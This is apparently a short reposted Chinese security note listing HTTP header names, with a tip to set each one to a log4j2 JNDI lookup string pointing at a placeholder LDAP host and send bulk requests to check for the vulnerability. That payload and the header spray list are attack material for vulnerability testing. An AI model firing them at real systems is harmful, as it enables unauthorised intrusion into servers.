User-Agent:
Accept-charset:
Accept-Datetime:
Accept-Encoding:
Accept-Language:
Cache-Control:
Cookie:
Forwareded:
Forwareded-For:
Forwareded-For-Ip:
Forwareded-Proto:
From:
Max-Forwards:
Origin:
Pragma:
Referer:
True-Client-Ip:
Via:
Warning:
X-Api-Version:
X-Att-Deviceid:
X-Correlation-Id:
X-Cstftoken:
x-Do-Not-Track:
X-Forward-For:
X-Forward-Proto:
X-Forwarded:
X-Forwarded-By:
X-Forwarded-For:
X-Forwarded-For-Original:
X-Forwarded-Host:
X-Forwarded-Port:
X-Forwarded-Proto:
X-Forwarded-Protocol:
X-Forwarded-Scheme:
X-Forwarded-Server:
X-Forwarded-Ssl:
X-Forwarder-For:
X-Frame-Options:
X-From:
X-Geoip-Country:
X-Http-Destinationurl:
X-Http-Host-Override:
X-Http-Method:
X-Http-Method-Override:
X-Http-Path-Override:
X-Https:
X-Htx-agent:
X-Hub-Signature:
X-If-Unmodified-Since:
X-Imbo-Test-Config:
X-Insight:
X-Ip:
X-Ip-Trail:
X-Proyuser-Ip:
X-Request-Id:
X-Requested-With:
X-Uidh:
X-Wap-Profile:
X-Xsrf-Token:
tip:在发送http请求时,可利用web批量请求器,添加上述http header头,值是${jndx(i):ldap://x.x.x.x/a}进行批量请求,验证log4j2漏洞。
原文始发于微信公众号(ListSec):http header头汇总